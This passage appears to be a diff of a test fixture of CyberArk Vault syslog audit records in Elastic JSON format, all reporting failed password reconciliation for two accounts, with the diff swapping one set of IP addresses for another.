login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: 